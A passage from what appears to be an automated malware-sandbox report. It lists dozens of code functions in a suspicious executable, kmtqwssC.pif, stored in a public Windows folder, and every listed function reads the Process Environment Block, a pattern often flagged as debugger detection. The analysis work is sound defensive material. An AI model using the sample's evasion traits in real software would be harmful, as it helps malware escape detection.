                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04D1D mov eax, dword ptr fs:[00000030h]6_2_2CE04D1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08EF5 mov eax, dword ptr fs:[00000030h]6_2_2CE08EF5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE86ED0 mov ecx, dword ptr fs:[00000030h]6_2_2CE86ED0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6EE0 mov eax, dword ptr fs:[00000030h]6_2_2CDD6EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6EE0 mov eax, dword ptr fs:[00000030h]6_2_2CDD6EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6EE0 mov eax, dword ptr fs:[00000030h]6_2_2CDD6EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6EE0 mov eax, dword ptr fs:[00000030h]6_2_2CDD6EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CEA0 mov eax, dword ptr fs:[00000030h]6_2_2CE5CEA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CEA0 mov eax, dword ptr fs:[00000030h]6_2_2CE5CEA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CEA0 mov eax, dword ptr fs:[00000030h]6_2_2CE5CEA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCAE90 mov eax, dword ptr fs:[00000030h]6_2_2CDCAE90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCAE90 mov eax, dword ptr fs:[00000030h]6_2_2CDCAE90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCAE90 mov eax, dword ptr fs:[00000030h]6_2_2CDCAE90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE6AEB0 mov eax, dword ptr fs:[00000030h]6_2_2CE6AEB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE6AEB0 mov eax, dword ptr fs:[00000030h]6_2_2CE6AEB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02E9C mov eax, dword ptr fs:[00000030h]6_2_2CE02E9C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02E9C mov ecx, dword ptr fs:[00000030h]6_2_2CE02E9C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCEE5A mov eax, dword ptr fs:[00000030h]6_2_2CDCEE5A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE50E7F mov eax, dword ptr fs:[00000030h]6_2_2CE50E7F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE50E7F mov eax, dword ptr fs:[00000030h]6_2_2CE50E7F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE50E7F mov eax, dword ptr fs:[00000030h]6_2_2CE50E7F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA2E4F mov eax, dword ptr fs:[00000030h]6_2_2CEA2E4F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA2E4F mov eax, dword ptr fs:[00000030h]6_2_2CEA2E4F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6E71 mov eax, dword ptr fs:[00000030h]6_2_2CDD6E71
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC8E1D mov eax, dword ptr fs:[00000030h]6_2_2CDC8E1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66E20 mov eax, dword ptr fs:[00000030h]6_2_2CE66E20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66E20 mov eax, dword ptr fs:[00000030h]6_2_2CE66E20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66E20 mov ecx, dword ptr fs:[00000030h]6_2_2CE66E20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov ecx, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAE00 mov eax, dword ptr fs:[00000030h]6_2_2CDFAE00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCEFD8 mov eax, dword ptr fs:[00000030h]6_2_2CDCEFD8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCEFD8 mov eax, dword ptr fs:[00000030h]6_2_2CDCEFD8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCEFD8 mov eax, dword ptr fs:[00000030h]6_2_2CDCEFD8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4FE7 mov eax, dword ptr fs:[00000030h]6_2_2CEA4FE7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2FC8 mov eax, dword ptr fs:[00000030h]6_2_2CDD2FC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2FC8 mov eax, dword ptr fs:[00000030h]6_2_2CDD2FC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2FC8 mov eax, dword ptr fs:[00000030h]6_2_2CDD2FC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2FC8 mov eax, dword ptr fs:[00000030h]6_2_2CDD2FC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE10FF6 mov eax, dword ptr fs:[00000030h]6_2_2CE10FF6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE10FF6 mov eax, dword ptr fs:[00000030h]6_2_2CE10FF6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE10FF6 mov eax, dword ptr fs:[00000030h]6_2_2CE10FF6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE10FF6 mov eax, dword ptr fs:[00000030h]6_2_2CE10FF6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE86FF7 mov eax, dword ptr fs:[00000030h]6_2_2CE86FF7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDECFE0 mov eax, dword ptr fs:[00000030h]6_2_2CDECFE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDECFE0 mov eax, dword ptr fs:[00000030h]6_2_2CDECFE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CF80 mov eax, dword ptr fs:[00000030h]6_2_2CE0CF80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02F98 mov eax, dword ptr fs:[00000030h]6_2_2CE02F98
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02F98 mov eax, dword ptr fs:[00000030h]6_2_2CE02F98
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4F68 mov eax, dword ptr fs:[00000030h]6_2_2CEA4F68
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72F60 mov eax, dword ptr fs:[00000030h]6_2_2CE72F60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE72F60 mov eax, dword ptr fs:[00000030h]6_2_2CE72F60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCF50 mov eax, dword ptr fs:[00000030h]6_2_2CDCCF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCF50 mov eax, dword ptr fs:[00000030h]6_2_2CDCCF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCF50 mov eax, dword ptr fs:[00000030h]6_2_2CDCCF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCF50 mov eax, dword ptr fs:[00000030h]6_2_2CDCCF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCF50 mov eax, dword ptr fs:[00000030h]6_2_2CDCCF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCF50 mov eax, dword ptr fs:[00000030h]6_2_2CDCCF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54F40 mov eax, dword ptr fs:[00000030h]6_2_2CE54F40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54F40 mov eax, dword ptr fs:[00000030h]6_2_2CE54F40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54F40 mov eax, dword ptr fs:[00000030h]6_2_2CE54F40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54F40 mov eax, dword ptr fs:[00000030h]6_2_2CE54F40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74F42 mov eax, dword ptr fs:[00000030h]6_2_2CE74F42
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CF50 mov eax, dword ptr fs:[00000030h]6_2_2CE0CF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAF69 mov eax, dword ptr fs:[00000030h]6_2_2CDFAF69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAF69 mov eax, dword ptr fs:[00000030h]6_2_2CDFAF69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE70F50 mov eax, dword ptr fs:[00000030h]6_2_2CE70F50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2F12 mov eax, dword ptr fs:[00000030h]6_2_2CDD2F12
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE86F00 mov eax, dword ptr fs:[00000030h]6_2_2CE86F00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEF28 mov eax, dword ptr fs:[00000030h]6_2_2CDFEF28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CF1F mov eax, dword ptr fs:[00000030h]6_2_2CE0CF1F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9A8E4 mov eax, dword ptr fs:[00000030h]6_2_2CE9A8E4
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C8F9 mov eax, dword ptr fs:[00000030h]6_2_2CE0C8F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C8F9 mov eax, dword ptr fs:[00000030h]6_2_2CE0C8F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE8C0 mov eax, dword ptr fs:[00000030h]6_2_2CDFE8C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0887 mov eax, dword ptr fs:[00000030h]6_2_2CDD0887
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C89D mov eax, dword ptr fs:[00000030h]6_2_2CE5C89D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD4859 mov eax, dword ptr fs:[00000030h]6_2_2CDD4859
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD4859 mov eax, dword ptr fs:[00000030h]6_2_2CDD4859
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66870 mov eax, dword ptr fs:[00000030h]6_2_2CE66870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66870 mov eax, dword ptr fs:[00000030h]6_2_2CE66870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E872 mov eax, dword ptr fs:[00000030h]6_2_2CE5E872
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E872 mov eax, dword ptr fs:[00000030h]6_2_2CE5E872
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE2840 mov ecx, dword ptr fs:[00000030h]6_2_2CDE2840
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE00854 mov eax, dword ptr fs:[00000030h]6_2_2CE00854
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A830 mov eax, dword ptr fs:[00000030h]6_2_2CE0A830
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7483A mov eax, dword ptr fs:[00000030h]6_2_2CE7483A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7483A mov eax, dword ptr fs:[00000030h]6_2_2CE7483A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov ecx, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C810 mov eax, dword ptr fs:[00000030h]6_2_2CE5C810
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E9E0 mov eax, dword ptr fs:[00000030h]6_2_2CE5E9E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE029F9 mov eax, dword ptr fs:[00000030h]6_2_2CE029F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE029F9 mov eax, dword ptr fs:[00000030h]6_2_2CE029F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE669C0 mov eax, dword ptr fs:[00000030h]6_2_2CE669C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE049D0 mov eax, dword ptr fs:[00000030h]6_2_2CE049D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9A9D3 mov eax, dword ptr fs:[00000030h]6_2_2CE9A9D3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE589B3 mov esi, dword ptr fs:[00000030h]6_2_2CE589B3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE589B3 mov eax, dword ptr fs:[00000030h]6_2_2CE589B3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE589B3 mov eax, dword ptr fs:[00000030h]6_2_2CE589B3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD09AD mov eax, dword ptr fs:[00000030h]6_2_2CDD09AD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD09AD mov eax, dword ptr fs:[00000030h]6_2_2CDD09AD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E mov eax, dword ptr fs:[00000030h]6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E mov edx, dword ptr fs:[00000030h]6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E mov eax, dword ptr fs:[00000030h]6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C97C mov eax, dword ptr fs:[00000030h]6_2_2CE5C97C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74978 mov eax, dword ptr fs:[00000030h]6_2_2CE74978
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74978 mov eax, dword ptr fs:[00000030h]6_2_2CE74978
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE50946 mov eax, dword ptr fs:[00000030h]6_2_2CE50946
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF6962 mov eax, dword ptr fs:[00000030h]6_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF6962 mov eax, dword ptr fs:[00000030h]6_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF6962 mov eax, dword ptr fs:[00000030h]6_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC8918 mov eax, dword ptr fs:[00000030h]6_2_2CDC8918
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC8918 mov eax, dword ptr fs:[00000030h]6_2_2CDC8918
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE6892B mov eax, dword ptr fs:[00000030h]6_2_2CE6892B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5892A mov eax, dword ptr fs:[00000030h]6_2_2CE5892A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E908 mov eax, dword ptr fs:[00000030h]6_2_2CE4E908
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E908 mov eax, dword ptr fs:[00000030h]6_2_2CE4E908
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C912 mov eax, dword ptr fs:[00000030h]6_2_2CE5C912
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0AD0 mov eax, dword ptr fs:[00000030h]6_2_2CDD0AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0AAEE mov eax, dword ptr fs:[00000030h]6_2_2CE0AAEE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0AAEE mov eax, dword ptr fs:[00000030h]6_2_2CE0AAEE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26ACC mov eax, dword ptr fs:[00000030h]6_2_2CE26ACC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26ACC mov eax, dword ptr fs:[00000030h]6_2_2CE26ACC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26ACC mov eax, dword ptr fs:[00000030h]6_2_2CE26ACC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04AD0 mov eax, dword ptr fs:[00000030h]6_2_2CE04AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04AD0 mov eax, dword ptr fs:[00000030h]6_2_2CE04AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26AA4 mov eax, dword ptr fs:[00000030h]6_2_2CE26AA4
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4A80 mov eax, dword ptr fs:[00000030h]6_2_2CEA4A80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08A90 mov edx, dword ptr fs:[00000030h]6_2_2CE08A90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8AA0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8AA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8AA0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8AA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0A5B mov eax, dword ptr fs:[00000030h]6_2_2CDE0A5B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0A5B mov eax, dword ptr fs:[00000030h]6_2_2CDE0A5B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7EA60 mov eax, dword ptr fs:[00000030h]6_2_2CE7EA60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA6F mov eax, dword ptr fs:[00000030h]6_2_2CE0CA6F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA6F mov eax, dword ptr fs:[00000030h]6_2_2CE0CA6F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA6F mov eax, dword ptr fs:[00000030h]6_2_2CE0CA6F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CA72 mov eax, dword ptr fs:[00000030h]6_2_2CE4CA72
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CA72 mov eax, dword ptr fs:[00000030h]6_2_2CE4CA72
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA24 mov eax, dword ptr fs:[00000030h]6_2_2CE0CA24
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA38 mov eax, dword ptr fs:[00000030h]6_2_2CE0CA38
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF4A35 mov eax, dword ptr fs:[00000030h]6_2_2CDF4A35
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF4A35 mov eax, dword ptr fs:[00000030h]6_2_2CDF4A35
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEA2E mov eax, dword ptr fs:[00000030h]6_2_2CDFEA2E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CA11 mov eax, dword ptr fs:[00000030h]6_2_2CE5CA11
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0BCD mov eax, dword ptr fs:[00000030h]6_2_2CDD0BCD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0BCD mov eax, dword ptr fs:[00000030h]6_2_2CDD0BCD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0BCD mov eax, dword ptr fs:[00000030h]6_2_2CDD0BCD
